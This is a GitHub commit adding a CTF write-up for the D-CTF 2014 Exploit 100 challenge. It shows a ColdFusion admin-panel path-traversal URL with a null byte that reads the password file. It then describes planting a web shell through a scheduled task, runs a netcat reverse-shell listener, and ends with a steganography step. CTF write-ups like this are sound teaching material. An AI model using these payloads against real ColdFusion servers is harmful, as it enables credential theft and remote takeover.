Skip to content

Commit 27e151b

Browse files
flexdmathiasbynens
authored andcommitted
D-CTF 2014: add Exploit 100 write-up
Closes ctfs#176.
1 parent dfc5bcd commit 27e151b

File tree

3 files changed

+20
-2
lines changed

3 files changed

+20
-2
lines changed

d-ctf-2014/README.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -5,6 +5,7 @@
55

66
## Completed write-ups
77

8+
* [Exploit 100](exploit-100)
89
* [Exploit 300](exploit-300)
910
* [Misc 100](misc-100)
1011
* [Misc 200](misc-200)
@@ -20,7 +21,6 @@
2021

2122
* [Bonus 100](bonus-100)
2223
* [Bonus 200](bonus-200)
23-
* [Exploit 100](exploit-100)
2424
* [Exploit 200](exploit-200)
2525
* [Exploit 400](exploit-400)
2626
* [Misc 400](misc-400)

d-ctf-2014/exploit-100/README.md

+19-1
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,25 @@
88
99
## Write-up
1010

11-
(TODO)
11+
Exploit the local path inclusion vulnerability in the ColdFusion admin panel:
12+
13+
```
14+
http://10.11.1.2/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
15+
```
16+
17+
This gets you an MD5 hash, which is the hash of the password `~Coldfusion`.
18+
19+
Now you can use the ColdFusion admin panel to add a ‘scheduled task’ to fetch your JSP/PHP/CFM shell and put it in a web-exposed directory. We used [a simple reverse shell](http://pastebin.com/09gpcxWL) in combination with `nc -v -n -l -p 4444`.
20+
21+
Once you have a shell, start digging. The flag is in `C:\Documents and Settings\admin\Desktop\paranoia.jpg` and looks like this:
22+
23+
![](paranoia.jpg)
24+
25+
The file name hints at [`paranoia.jar`](https://ccrma.stanford.edu/~eberdahl/Projects/Paranoia/) which is a steganography tool. Using that tool (or another stenography tool) with the provided image and the key `That's the most evilest thing I can imagine.` we find the flag:
26+
27+
```
28+
The Cold War is over but Cold War thinking survives.
29+
```
1230

1331
## Other write-ups and resources
1432

d-ctf-2014/exploit-100/paranoia.jpg

40.3 KB
Loading

0 commit comments

Comments
 (0)